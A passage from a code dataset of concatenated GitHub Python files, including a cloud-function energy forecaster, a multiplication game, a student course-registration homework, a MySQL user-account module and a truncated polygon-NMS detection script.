preposition, what = state.subscriptions.pop()\n except IndexError:\n logger.debug(\"Didn't remind anybody\")\n return\n else:\n if when <= datetime.now():\n yield Message.privmsg(message.recipient,\n '{}: Reminder: {}'.format(who, what))\n else:\n state.subscriptions.push((when, who, preposition, what))\n else:\n logger.debug(\"Didn't remind anybody\")\n","repo_name":"memery/leczair","sub_path":"plugins/reminder.py","file_name":"reminder.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16873033756","text":"\"\"\"\nGoogle Cloud Function\n\nTriggered by a google cloud cron daily at 0110\n\nAccesses the raw predictions in GCS and calcualtes the persistance forecast for the next day's benchmark predictions.\n\nTypes of persistance forecasts available:\n\n1. Persistance: Previous day's demand used as today's forecast.\n2. Persistance 3 Day Moving Average: Applies a moving average to the last 3 days.\n3. Persistance Hourly-by-hour 3 day moving average: Applies a moving average for each hour of the day for the last 3 days.\n\n\"\"\"\n\n\ndef gen_persistance_forecasts(request):\n from datetime import datetime, timedelta\n import pandas as pd\n import numpy as np\n from google.cloud import storage\n \n FOLDER_DOWN = 'raw-days'\n FOLDER_UP = 'persistance_forecasts'\n BUCKET = 'ml-energy-dashboard-raw-data'\n \n def get_time_dates(period):\n end = datetime.today()\n start = datetime.today() + timedelta(-period)\n delta = end-start\n\n time_pairs = list()\n\n for i in range(delta.days+1):\n begin_time = (start + timedelta(i-1)).strftime('%Y%m%d')\n begin_time = f'{begin_time}T2300'\n end_time = (start + timedelta(i)).strftime('%Y%m%d')\n end_time = f'{end_time}T2300'\n\n time_pairs.append((begin_time, end_time))\n \n return time_pairs \n \n def raw_data_date():\n return (datetime.today()+timedelta(-1)).strftime('%Y%m%d')\n \n def gcs_save_name(date):\n return f'es-persistance-forecasts-{date}'\n \n def gcs_load_name(start, end):\n return f'es-energy-demand-{start}-{end}'\n\n def get_gcs_data(client, bucket_name, folder_name, file_name):\n \n bucket = client.get_bucket(bucket_name)\n blob = bucket.blob(f'{folder_name}/{file_name}')\n data_json = blob.download_as_string()\n \n return pd.read_json(data_json, typ='series', orient='records', keep_default_dates=False)\n \n def upload_data_to_gcs(client, data, bucket_name, folder_name, file_name):\n \n bucket = client.get_bucket(bucket_name)\n blob = bucket.blob(f'{folder_name}/{file_name}')\n blob.upload_from_string(data.to_json())\n \n def reset_data_index(data_list):\n\n data = pd.concat(data_list, axis=0)\n data.index = data.index.tz_localize('UTC').tz_convert('Europe/Madrid')\n\n return data\n\n\n def persistance(series, date):\n return series[date]\n\n def persistance_day_ma(series, num_days, date):\n \n window=24*num_days\n rolling_mean = series.rolling(window=window, min_periods=24, closed='right').mean()\n \n return rolling_mean[date]\n\n def persistance_MA_hourly(series, days):\n \n df = series.groupby(series.index.hour).mean()\n \n return df\n\n def calc_persistance_forecasts(data):\n date = (datetime.today()+timedelta(-1)).strftime('%Y%m%d')\n \n p1 = persistance(data, date)\n p2 = persistance_day_ma(data, 3, date)\n p3 = persistance_MA_hourly(data, 3)\n \n data = np.vstack([p1.values, p2.values, p3.values]).T\n persist_df = pd.DataFrame(data, columns=['naive', 'MA3-day', 'MA30day-hbh'])\n\n today = datetime.today().strftime('%Y%m%d')\n persist_df.index = pd.DatetimeIndex(pd.date_range(start=f'{today}T0000', end=f'{today}T2300', freq='H'))\n \n return persist_df\n\n params = request.get_json()\n \n if 'gen_persist' in params and params['gen_persist']:\n storage_client = storage.Client()\n\n # creds = service_account.Credentials.from_service_account_file(os.environ['GOOGLE_APPLICATION_CREDENTIALS'])\n # storage_client = storage.Client(credentials=creds, project=project_id)\n #download the data to make the persistance forecast\n time_pairs = get_time_dates(3)\n print(time_pairs)\n data_list = list()\n\n for time_pair in time_pairs:\n\n file_name = f'es-energy-demand-{time_pair[0]}-{time_pair[1]}'\n data = get_gcs_data(storage_client, BUCKET, FOLDER_DOWN, file_name)\n data_list.append(data)\n \n data = reset_data_index(data_list)\n\n #calcuate the persistance forecasts\n persistance_forecasts = calc_persistance_forecasts(data)\n\n #upload to gcs\n persistance_file_name = gcs_save_name(datetime.today().strftime('%Y%m%d'))\n #create persistance - simple persistance today's values >> tomorrow forecast\n upload_data_to_gcs(storage_client, persistance_forecasts, BUCKET, FOLDER_UP, persistance_file_name)\n","repo_name":"kolasniwash/electrical-forecast-prediction-service","sub_path":"cloud_functions/gen_persistance_forecasts.py","file_name":"gen_persistance_forecasts.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"} +{"seq_id":"21494370449","text":"# Task 08\r\n# Созданы переменные d и e. Создайте переменную f куда поместите результат деления d на e. Выведите в консоль переменную f.\r\n\r\nd = 1024\r\ne = 128\r\n\r\n# write your code under this line\r\n\r\nf = d / e\r\nprint(f)","repo_name":"GrytsenkoAndrey/itgid-python","sub_path":"sprint_02/08.py","file_name":"08.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25027007601","text":"import time\r\nimport numpy as np\r\n\r\nprint(\"\"\"Let's start the game!\"\"\")\r\n\r\n# Inputs\r\nFinish = True\r\npuntos_totales = 0\r\nmaximo = int(input('Maxim number of the range='))\r\nminimo = int(input('Minim number of the range='))\r\n\r\n# Game loop\r\nwhile Finish:\r\n \r\n num1 = np.random.randint(minimo,maximo)\r\n num2 = np.random.randint(minimo,maximo)\r\n correct = num1 * num2\r\n seconds = time.time()\r\n \r\n print(\"{} x {} = \".format(num1,num2))\r\n number = input(\"\")\r\n \r\n if number == 'Finish':\r\n Finish = False\r\n else:\r\n number = int(number)\r\n\r\n puntos = len(str(correct))\r\n\r\n if number == correct and Finish:\r\n print(\"Corect\")\r\n if time.time()-seconds < 5:\r\n puntos_totales = puntos_totales + puntos\r\n print(\"Points = {} \\nTotal points = {}\".format(puntos,puntos_totales))\r\n elif Finish:\r\n print(\"Incorrect\")\r\n print(\"The correct number is = {}\".format(correct))\r\n\r\n if time.time()-seconds > 5:\r\n print('Time out')\r\n","repo_name":"RubenPhy/Little_things","sub_path":"Multiplication_Game-master/Amateur_version.py","file_name":"Amateur_version.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71477976741","text":"# In this file, we define download_model\n# It runs during container build time to get model weights built into the container\n\n# In this example: A Huggingface GPTJ model\n\nimport torch\nfrom transformers import AutoModelForCausalLM, AutoTokenizer\n\n\ndef download_model():\n # do a dry run of loading the huggingface model, which will download weights\n print(\"downloading model...\")\n tokenizer = AutoTokenizer.from_pretrained(\"togethercomputer/GPT-JT-6B-v1\")\n print(\"done\")\n\n print(\"downloading tokenizer...\")\n model = AutoModelForCausalLM.from_pretrained(\"togethercomputer/GPT-JT-6B-v1\")\n print(\"done\")\n\nif __name__ == \"__main__\":\n download_model()","repo_name":"lucataco/serverless-template-gpt-jt","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"73662106341","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error\n\ndef mse(poly, graph):\n z=sum((poly-graph)**2)/len(poly)\n return z\n\ndef mae(poly, graph):\n z=sum(abs(poly-graph))/len(poly)\n return z\n\n\ndef read_file(file):\n lst = []\n\n for line in file:\n lst += [line.split()]\n x = [float(x[0]) for x in lst]\n y = [float(x[1]) for x in lst]\n return x, y\n\n \ndef plot_fit(x, y, label, file):\n\n plt.plot(x, y, label='by '+label)\n plt.grid(True, which=\"both\", ls=\"-\", color='0.9')\n plt.xlabel(r'$n_{rows}=n_{cols}$')\n plt.ylabel('CPUTIME [s]')\n\n\n\n z3,resz3, _, _, _ = np.polyfit(x, y, deg=3, full=True)\n p3 = np.poly1d(z3)\n\n z2,resz2, _, _, _ = np.polyfit(x, y, deg=2, full=True)\n p2 = np.poly1d(z2)\n\n z4,resz4, _, _, _ = np.polyfit(x, y, deg=4, full=True)\n p4 = np.poly1d(z4)\n\n \n z_list = [z2, z3, z4]\n mse_2 = mean_squared_error(p2(x), y)\n mse_3 = mean_squared_error(p3(x), y)\n mse_4 = mean_squared_error(p4(x), y)\n mae_2 = mean_absolute_error(p2(x), y)\n mae_3 = mean_absolute_error(p3(x), y)\n mae_4 = mean_absolute_error(p4(x), y)\n \n for z in z_list:\n \n file.write(str(z)+'\\n')\n file.close()\n \n\n xp = np.linspace(0, 2000, 200)\n plt.plot(xp, p2(xp), '-', label=f'n=2, MSE={mse_2:.5f}')\n plt.plot(xp, p3(xp), '-', label=f'n=3, MSE={mse_3:.5f}')\n plt.plot(xp, p4(xp), '-', label=f'n=4, MSE={mse_4:.5f}')\n plt.legend()\n plt.title(f'polynomial fit (deg=n) for Matrix size vs CPUTIME,\\n by {label} multiplication')\n plt.savefig(f'outfile/polyfitby{label}.png', dpi=300)\n plt.show()\n \n\n\n\n\n\n\nfile = open('outfile/matmul_col.dat')\nx, ycol = read_file(file)\nfile = open('outfile/matmul_row.dat')\nx, yrow = read_file(file)\nfile = open('outfile/matmul_routine.dat')\nx, yF = read_file(file)\n\n\nplt.plot(x, yrow, label='by rows')\nplt.plot(x, ycol, label='by cols')\nplt.plot(x, yF, label='Fortran subroutine')\nplt.yscale('log', nonpositive='clip')\nplt.legend()\nplt.grid(True, which=\"both\", ls=\"-\", color='0.9')\nplt.xlabel(r'$n_{rows}=n_{cols}$')\nplt.ylabel('CPUTIME [s]')\n#plt.tight_layout()\nplt.savefig(f'outfile/CPUTIME.png', dpi=300)\nplt.show()\n\n\n\nplot_fit(x, ycol, 'cols', open('outfile/zcols.dat', 'w'))\nplot_fit(x, yrow, 'rows', open('outfile/zrows.dat', 'w'))\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"giuliacampesan/UniversityAssignments","sub_path":"QuantumInfo/ex3/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"18170832409","text":"from collections import defaultdict, deque\nfrom vector import Vec2D\nfrom static_objects import Bullet\nfrom settings import TILE_SIZE, ENEMIES, SIZE_X, SIZE_Y\n\n\nclass Enemy():\n coords = []\n direction = Vec2D(0, 0)\n angle = 0\n turn = 0\n alive = True\n health = 100\n target = None\n bullet = None\n\n def __init__(self, coords):\n self.coords = coords\n\n def create_bullet(self):\n start = self.coords[2] + self.direction\n self.bullet = Bullet(start, self.direction, self.angle, \"enemy\")\n\n def check_health(self):\n self.health -= 30\n if self.health <= 0:\n self.alive = False\n\n def move(self, world):\n for i, position in enumerate(self.coords):\n ind1, ind2 = self.coords[i]\n move = position + self.direction\n world[move[0]][move[1]].energy += world[ind1][ind2].energy\n self.coords[i] = move\n if self.direction[0] == 0 and self.direction[1] < 0:\n self.angle = -180\n elif self.direction[0] == 0 and self.direction[1] > 0:\n self.angle = 0\n elif self.direction[1] == 0 and self.direction[0] < 0:\n self.angle = -90\n elif self.direction[1] == 0 and self.direction[0] > 0:\n self.angle = 90\n\n def valid_moves(self, cell):\n directions = [Vec2D(4, 0), Vec2D(0, -4), Vec2D(-4, 0), Vec2D(0, 4)]\n cells = [(direction + cell, direction) for direction in directions]\n check = lambda c: c[0][0] >= 0 and c[0][0] < SIZE_X and \\\n c[0][1] >= 0 and c[0][1] < SIZE_Y\n return filter(check, cells)\n\n def check_by_cell(self, direction, world):\n return all(map(lambda tile:\n self.check_direction(tile, direction, world),\n self.coords))\n\n def find_neighbours(self, cell, index, world, player):\n valid = self.valid_moves(cell)\n neigh_dict = defaultdict(list)\n for next, direction in valid:\n if self.check_by_cell(direction // 4, world):\n key = world[next[0]][next[1]].energy\n neigh_dict[key].append(direction // 4)\n self.direction = self.find_next(neigh_dict, index, world, player)\n\n def check_direction(self, cell, direction, world):\n p = cell + direction\n return \\\n p[0] >= 0 and p[0] < SIZE_X and \\\n p[1] >= 0 and p[1] < SIZE_Y and \\\n world[p[0]][p[1]].empty()\n\n def check_for_player(self, cell, direction, world):\n p = cell + direction\n return \\\n p[0] >= 0 and p[0] < SIZE_X and \\\n p[1] >= 0 and p[1] < SIZE_Y and \\\n (world[p[0]][p[1]].empty() or \\\n world[p[0]][p[1]].content == 'G' or \\\n world[p[0]][p[1]].content == 'Y')\n\n def detect_collision(self, direction, world):\n cells = [cell + direction for cell in self.coords\n if self.check_for_player(cell, direction, world)]\n return any([world[x][y].content == 'Y' or\n world[x][y].content == 'G' for x, y in cells])\n\n def find_next(self, neighbour_dirs, index, world, player):\n if player.distance(self.coords[0]) <= 10:\n self.create_bullet()\n keys = neighbour_dirs.keys()\n next_dir = None\n if keys:\n max_energy = max(keys)\n valid_dirs = neighbour_dirs[max_energy]\n for direction in valid_dirs:\n if self.detect_collision(direction, world):\n self.create_bullet()\n for direction in valid_dirs:\n if self.direction.same_direction(direction):\n return direction\n for direction in valid_dirs:\n if self.direction.same_direction(-direction):\n return direction\n if index < len(valid_dirs):\n self.create_bullet()\n return valid_dirs[index]\n elif valid_dirs:\n return valid_dirs[len(valid_dirs)-self.turn-1]\n else:\n self.create_bullet()\n return self.direction.rotate()\n","repo_name":"filareta/battle_city_game","sub_path":"enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36402821198","text":"# HW2\n#Hersh Budhwar\n#Due Date: 09/25/2020, 11:59PM\n\"\"\" \n### Collaboration Statement:\n \n\"\"\"\nimport random\n\n\nclass Course:\n def __init__(self, cid, cname, credits):\n self.cid = cid #Course id\n self.cname = cname #Course name\n self.creds = credits #Credits\n\n\n def __str__(self):\n return(str(self.cid) + \"(\" + str(self.creds) + \"): \" + str(self.cname)) #CourseID(Credits): Course Name\n\n __repr__ = __str__\n\n def __eq__(self, other): # ==\n if isinstance(other, Course):\n if self.cid == other.cid:\n return True\n return False\n\n\nclass Catalog:\n def __init__(self):\n self.courses = {} #Dictionary containing all the courses offered\n\n\n @property\n def courseOfferings(self):\n return(self.courses)\n\n def addCourse(self, cid, cname, credits):\n if cid in self.courses: #Check if already in\n return(\"Course already added\")\n self.courses[cid] = (Course(cid, cname, credits)) #Not already in, so put it in\n return(\"Course added successfully\")\n\n\n def removeCourse(self, cid):\n if cid in self.courses: #Check if in catalog\n self.courses.pop(cid) #Remove\n return(\"Course removed successfully\")\n return(\"Course not found\")\n\n\nclass Semester:\n def __init__(self, sem_num):\n self.semnum = sem_num #Semester num\n self.courses = [] #List of courses in semester\n\n\n def __str__(self):\n if len(self.courses) == 0: #Return no courses if none in list\n return(\"No courses\")\n return(str(self.courses)[1:-1]) #Gets rid of brackets\n\n\n __repr__ = __str__\n\n\n def addCourse(self, course):\n if isinstance(course, Course) and isinstance(course.creds, int): #Makes sure course is a valid course\n if course in self.courses:\n return(\"Course already added\")\n self.courses.append(course) #Appends course if it passes all checks\n return\n else:\n return(\"Invalid course\")\n\n\n def dropCourse(self, course):\n if isinstance(course, Course): #converts course to just the ID to work with both scenarios\n course = course.cid\n\n if isinstance(course, str):\n for i in range(len(self.courses)): #Loops through list to find matches\n if self.courses[i].cid == course:\n self.courses.pop(i) #Removes\n return\n return(\"No such course\")\n return (\"Invalid course\")\n\n\n @property\n def totalCredits(self):\n total = 0 #\n for i in self.courses:\n total += i.creds\n return(total)\n\n\n @property\n def isFullTime(self):\n if self.totalCredits >= 12: #If greater than or equal to 12 credits\n return True\n return False\n\n \nclass Loan:\n def __init__(self, amount):\n self.amount = amount #\n self.loan_id = self.__loanID #Get random id\n\n\n def __str__(self):\n return(f\"Balance: ${self.amount}\") #Balance: #Amount\n\n __repr__ = __str__\n\n\n @property\n def __loanID(self):\n self.loan_id = random.randrange(10000,100000)\n return self.loan_id\n\n\nclass Person:\n '''\n >>> p1 = Person('Jason Lee', '204-99-2890')\n >>> p2 = Person('Karen Lee', '247-01-2670')\n >>> p1\n Person(Jason Lee, ***-**-2890)\n >>> p2\n Person(Karen Lee, ***-**-2670)\n >>> p3 = Person('Karen Smith', '247-01-2670')\n >>> p3\n Person(Karen Smith, ***-**-2670)\n >>> p2 == p3\n True\n >>> p1 == p2\n False\n '''\n\n def __init__(self, name, ssn):\n self.name = name\n self.ssn = ssn\n\n\n def __str__(self):\n return(f\"Person({self.name}, ***-**-{self.ssn[-4:]})\") #Person(Name, ***-**-Last 4 of SSN)\n\n\n __repr__ = __str__\n\n\n def get_ssn(self):\n return(self.ssn) #Returns full SSN\n\n\n def __eq__(self, other):\n if isinstance(other, Person):\n if self.ssn == other.ssn: #Checks equality based on SSN\n return True\n return False\n\n\nclass Staff(Person):\n def __init__(self, name, ssn, supervisor=None):\n super().__init__(name,ssn) #Gets values from person class\n self.supervisor = supervisor\n\n\n def __str__(self):\n return(f\"Staff({self.name}, {self.id})\") #Staff(Name, ID)\n\n __repr__ = __str__\n\n\n @property\n def id(self):\n output = \"905\"\n initials_list = self.name.split(\" \")\n for i in initials_list:\n output += str(i[0:1].lower())\n output += self.ssn[-4:]\n return(output)\n\n\n @property \n def getSupervisor(self):\n return self.supervisor\n\n\n def setSupervisor(self, new_supervisor):\n if isinstance(new_supervisor, Staff): #Checks validity\n self.supervisor = new_supervisor #Set\n return(\"Completed!\")\n return()\n\n\n def applyHold(self, student):\n if isinstance(student, Student): #Check validity\n student.hold = True\n return(\"Completed!\")\n return\n\n\n def removeHold(self, student):\n if isinstance(student, Student): #Check\n student.hold = False\n return (\"Completed!\")\n return\n\n\n def unenrollStudent(self, student):\n if isinstance(student, Student): #Check\n student.active = False\n return (\"Completed!\")\n return\n\n\nclass Student(Person):\n def __init__(self, name, ssn, year):\n random.seed(1)\n super().__init__(name, ssn) #Initialize with subclass of person for values\n self.year = year\n self.hold = False\n self.active = True\n self.sem = None\n self.semesters = {}\n self.account = self.__createStudentAccount() #Gets a student account in connection\n\n\n def __str__(self):\n return(f\"Student({self.name}, {self.id}, {self.year})\") #Student(Name, ID, Year)\n\n\n __repr__ = __str__\n\n\n def __createStudentAccount(self):\n if self.active:\n return StudentAccount(self)\n return\n\n\n @property\n def id(self):\n output = \"\"\n initials_list = self.name.split(\" \") #Splits into each part of name\n for i in initials_list: #Incase of middle names\n output += str(i[0:1].lower())\n output += self.ssn[-4:] #Gets last four numbers\n return(output)\n\n\n def registerSemester(self):\n if not self.hold and self.active:\n self.semesters[len(self.semesters) + 1] = [Semester(len(self.semesters) + 1)] #Makes a semester with a key of 1 and the semester's sem_num = the same\n return\n return(\"Unsuccessful operation\")\n\n\n def enrollCourse(self, cid, catalog, semester):\n if self.active and not self.hold:\n classes = catalog.courseOfferings #Shortcut\n if cid in classes: #If offered\n if classes[cid] not in self.semesters[semester][0].courses: #If not already in\n self.semesters[semester][0].addCourse(classes[cid]) #Add\n self.account.balance += (self.account.ppc * classes[cid].creds) #add to balance\n return (\"Course added successfully\")\n return(\"Course already enrolled\")\n return(\"Course not found\")\n return(\"Unsuccessful operation\")\n\n\n def dropCourse(self, cid, semester):\n if self.active and not self.hold:\n\n classCreds = 0\n\n for i in range(len(self.semesters[semester][0].courses)): #Gets credits for later\n if self.semesters[semester][0].courses[i].cid == cid:\n classCreds = self.semesters[semester][0].courses[i].creds\n\n x = self.semesters[semester][0].dropCourse(cid)\n if x is None:\n self.account.balance -= (self.account.ppc * classCreds) #Adds back balance\n return(\"Course dropped successfully\")\n elif x == \"No such course\":\n return(\"Course not found\")\n elif x == \"Invalid course\":\n return x\n return(\"Unsuccessful operation\")\n\n\n def getLoan(self, amount):\n if not self.hold and self.active:\n if len(self.semesters) != 0 and self.semesters[1][0].isFullTime: #If full time and has classes\n newLoan = Loan(amount) #Creates loan\n if newLoan.loan_id in self.account.loans: #If loan id already exists\n self.account.loans[newLoan.loan_id].amount += newLoan.amount\n else: #Loan id is unique\n self.account.loans[newLoan.loan_id] = newLoan\n return\n return(\"Not full-time\")\n return(\"Unsuccessful operation\")\n\n\nclass StudentAccount:\n def __init__(self, student):\n self.student = student #Initialize\n self.balance = 0\n self.loans = {}\n self.ppc = 1000\n\n\n def __str__(self):\n return(f\"Name: {self.student.name}\\nID: {self.student.id}\\nBalance: ${self.balance}\") # \\n = new line\n\n __repr__ = __str__\n\n\n def makePayment(self, amount, loan_id=None):\n if loan_id is not None: #If using loans\n if loan_id in self.loans: #If loan exists\n if amount <= self.loans[loan_id].amount: #If amount is valid\n self.balance -= amount\n self.loans[loan_id].amount -= amount\n return self.balance\n return(f\"Loan Balance: {self.loans[loan_id].amount}\")\n return self.loans\n\n self.balance -= amount #No loan\n return self.balance\n\n\n def chargeAccount(self, amount):\n self.balance += amount #Just adds it\n return self.balance\n\n\n######################################################################\n\n\ndef createStudent(person):\n return Student(person.name, person.get_ssn(), \"Freshman\") #Gets values from person and puts them into student (+ freshman)\n\n","repo_name":"hersh-b/Penn-State-Courses-and-Finances-System","sub_path":"MainCode.py","file_name":"MainCode.py","file_ext":"py","file_size_in_byte":9975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25359335543","text":"def stringify(value, replacer=' ', spaces_count=1, _level=1):\n if isinstance(value, str):\n return value\n elif isinstance(value, bool):\n return str(value)\n elif isinstance(value, (int, float)):\n return str(value)\n elif isinstance(value, dict):\n indent = replacer * spaces_count * _level\n result = '{\\n'\n for k, v in value.items():\n result += f'{indent}{k}: '\n result += f'{stringify(v, replacer, spaces_count, _level+1)}\\n'\n result += f'{replacer * spaces_count * (_level - 1)}}}'\n return result\n else:\n raise ValueError(f'Unsupported value type: {type(value)}')\n\nnested = {\n \"string\": \"value\",\n \"boolean\": True,\n \"number\": 5,\n \"dict\": {\n 5: \"number\",\n None: \"None\",\n True: \"boolean\",\n \"value\": \"string\",\n \"nested\": {\n \"boolean\": True,\n \"string\": 'value',\n \"number\": 5,\n None: \"None\",\n },\n },\n}\n\n# nested = {\n# \"string\": \"value\",\n \n# \"dict\": {\n# 5: \"number\",\n \n# \"nested\": {\n# \"string\": 'value',\n# },\n# },\n# }\n\n# primitives_data = {\n# \"string\": \"value\",\n# \"boolean\": True,\n# \"number\": 5,\n# }\n\ndata = { \"hello\": \"world\", \"is\": True, \"nested\": { \"count\": 5 } }\n# data = True \n\n# print(stringify(data, replacer=' ', spaces_count=1))\n\n# print(stringify(primitives_data, '|-', 3))\n\n# a = stringify(\"dsfdc\")\nprint(stringify(nested, '|-', 2))\nprint(type(data))\n","repo_name":"AlexanderLarriva/Stringify","sub_path":"stringify/stringify.py","file_name":"stringify.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"137459766","text":"import pymysql\r\nimport hashlib\r\nimport string\r\nimport json\r\nimport random\r\nimport os\r\nfrom dotenv import load_dotenv\r\n\r\nload_dotenv(dotenv_path=\".envvar\")\r\n\r\nconn = pymysql.connect(\r\n host=os.getenv(\"MYSQL_HOST\"),\r\n passwd=os.getenv(\"MYSQL_PASSWORD\"),\r\n user=os.getenv(\"MYSQL_USER\"),\r\n db=\"user\",\r\n port=int(os.getenv(\"MYSQL_PORT\")),\r\n autocommit=True\r\n)\r\ncursor = conn.cursor()\r\n\r\ndef Get_User(name):\r\n query = \"\"\"SELECT * FROM users WHERE username = %s\"\"\"\r\n cursor.execute(query, [name])\r\n information = cursor.fetchone()\r\n return information\r\n\r\ndef SetPermCreate(name):\r\n query = \"UPDATE users SET permcreate = 1 WHERE (`username` = %s);\"\r\n cursor.execute(query, [name])\r\n conn.commit()\r\n return True\r\n\r\ndef SetAuthentication(name):\r\n query = \"UPDATE users SET `email authorizated` = 1 WHERE (`username` = %s);\"\r\n cursor.execute(query, [name])\r\n conn.commit()\r\n return True\r\n\r\ndef Get_User_Email(email):\r\n query = \"\"\"SELECT * FROM users WHERE email = %s\"\"\"\r\n cursor.execute(query, [email])\r\n information = cursor.fetchone()\r\n return information\r\n\r\ndef Get_User_id(id):\r\n query = \"\"\"SELECT * FROM users WHERE id = %s\"\"\"\r\n cursor.execute(query, [id])\r\n information = cursor.fetchone()\r\n return information\r\n\r\ndef Create_User(name, password, email):\r\n createperm = False\r\n reportperm = True\r\n if not Get_User(name) == None:\r\n a = True\r\n return \"Benutzername bereits vergeben!\"\r\n if not Get_User_Email(email) == None:\r\n a = True\r\n return \"Email bereits vergeben!\"\r\n else:\r\n a = False\r\n if a == False:\r\n h = hashlib.new(\"whirlpool\")\r\n stringLength = 16\r\n characters = string.ascii_letters + string.digits + string.punctuation\r\n salt = ''.join(random.choice(characters) for i in range(stringLength))\r\n password = password + salt\r\n h.update(password.encode())\r\n password = h.hexdigest()\r\n query = \"\"\"INSERT INTO users\r\n (username, pwd, email, permcreate, permreport, salt)\r\n VALUES (%s, %s, %s, %s, %s, %s)\"\"\"\r\n values = (name, password, email, createperm, reportperm, salt)\r\n cursor.execute(query, values)\r\n conn.commit()\r\n succesfull = True\r\n else:\r\n succesfull = False\r\n return succesfull\r\n\r\ndef Change_Pwd(name, old_pwd, new_pwd):\r\n information = Get_User(name)\r\n h = hashlib.new(\"whirlpool\")\r\n old_pwd = old_pwd + information[8]\r\n h.update(old_pwd.encode())\r\n old_pwd = h.hexdigest()\r\n if information[2] == old_pwd:\r\n query = \"\"\"UPDATE users SET pwd = %s, salt=%s WHERE username = %s;\"\"\"\r\n h = hashlib.new(\"whirlpool\")\r\n stringLength = 16\r\n characters = string.ascii_letters + string.digits + string.punctuation\r\n salt = ''.join(random.choice(characters) for i in range(stringLength))\r\n new_pwd = new_pwd + salt\r\n h.update(new_pwd.encode())\r\n new_pwd = h.hexdigest()\r\n cursor.execute(query, [new_pwd, salt, name])\r\n succesfull = True\r\n else:\r\n succesfull = False\r\n conn.commit()\r\n return succesfull\r\n\r\ndef Change_Pwd_without_oldpwd(name, new_pwd):\r\n h = hashlib.new(\"whirlpool\")\r\n stringLength = 16\r\n characters = string.ascii_letters + string.digits + string.punctuation\r\n salt = ''.join(random.choice(characters) for i in range(stringLength))\r\n new_pwd = new_pwd + salt\r\n h.update(new_pwd.encode())\r\n new_pwd = h.hexdigest()\r\n query = \"UPDATE users SET pwd = %s, salt = %s WHERE username = %s\"\r\n cursor.execute(query, [new_pwd, salt, name])\r\n conn.commit()\r\n return True\r\n\r\ndef Change_Email(name, email, pwd):\r\n information = Get_User(name)\r\n h = hashlib.new(\"whirlpool\")\r\n pwd = pwd + information[8]\r\n h.update(pwd.encode())\r\n pwd = h.hexdigest()\r\n if information[2] == pwd:\r\n if Get_User_Email(email) == None:\r\n query = \"\"\"UPDATE users SET email = %s WHERE username = %s;\"\"\"\r\n cursor.execute(query, [email, name])\r\n query = \"\"\"UPDATE users SET `email authorizated` = 0 WHERE username = %s;\"\"\"\r\n cursor.execute(query, [name])\r\n conn.commit()\r\n return True\r\n else:\r\n return \"Email bereits vergeben\"\r\n else:\r\n return \"Falsches Passwort\"\r\n\r\ndef Login(name, pwd):\r\n information = Get_User(name)\r\n if information is None:\r\n return False\r\n h = hashlib.new(\"whirlpool\")\r\n pwd = pwd + information[8]\r\n h.update(pwd.encode())\r\n pwd = h.hexdigest()\r\n if not information == None:\r\n if information[2] == pwd:\r\n succesfull = True\r\n else:\r\n succesfull = False\r\n else:\r\n succesfull = False\r\n\r\n return succesfull\r\n\r\ndef Delete_Account(name):\r\n query = \"DELETE FROM `user`.`users` WHERE (`username` = %s);\"\r\n cursor.execute(query, [name])\r\n conn.commit()\r\n return True\r\n\r\n# conn.commit()\r\n# conn.close()\r\n","repo_name":"NeonCrafter13/easyvoc","sub_path":"Website/db/userdb.py","file_name":"userdb.py","file_ext":"py","file_size_in_byte":4979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36791160359","text":"import cv2\nimport math\nimport mmcv\nimport numpy as np\nimport os\nimport pdb\nfrom mmcv import Config\nfrom tqdm import tqdm\n\nimport DOTA_devkit.polyiou as polyiou\nfrom mmdet.apis import init_detector, inference_detector, draw_poly_detections\nfrom mmdet.datasets import get_dataset\n\ndota15_colormap = [\n (54, 67, 244),\n (99, 30, 233),\n (176, 39, 156),\n (183, 58, 103),\n (181, 81, 63),\n (243, 150, 33),\n (212, 188, 0),\n (136, 150, 0),\n (80, 175, 76),\n (74, 195, 139),\n (57, 220, 205),\n (59, 235, 255),\n (0, 152, 255),\n (34, 87, 255),\n (72, 85, 121),\n (139, 125, 96)]\n\n\ndef py_cpu_nms_poly_fast_np(dets, thresh):\n obbs = dets[:, 0:-1]\n x1 = np.min(obbs[:, 0::2], axis=1)\n y1 = np.min(obbs[:, 1::2], axis=1)\n x2 = np.max(obbs[:, 0::2], axis=1)\n y2 = np.max(obbs[:, 1::2], axis=1)\n scores = dets[:, 8]\n areas = (x2 - x1 + 1) * (y2 - y1 + 1)\n\n polys = []\n for i in range(len(dets)):\n tm_polygon = polyiou.VectorDouble([dets[i][0], dets[i][1],\n dets[i][2], dets[i][3],\n dets[i][4], dets[i][5],\n dets[i][6], dets[i][7]])\n polys.append(tm_polygon)\n order = scores.argsort()[::-1]\n\n keep = []\n while order.size > 0:\n ovr = []\n i = order[0]\n keep.append(i)\n xx1 = np.maximum(x1[i], x1[order[1:]])\n yy1 = np.maximum(y1[i], y1[order[1:]])\n xx2 = np.minimum(x2[i], x2[order[1:]])\n yy2 = np.minimum(y2[i], y2[order[1:]])\n w = np.maximum(0.0, xx2 - xx1)\n h = np.maximum(0.0, yy2 - 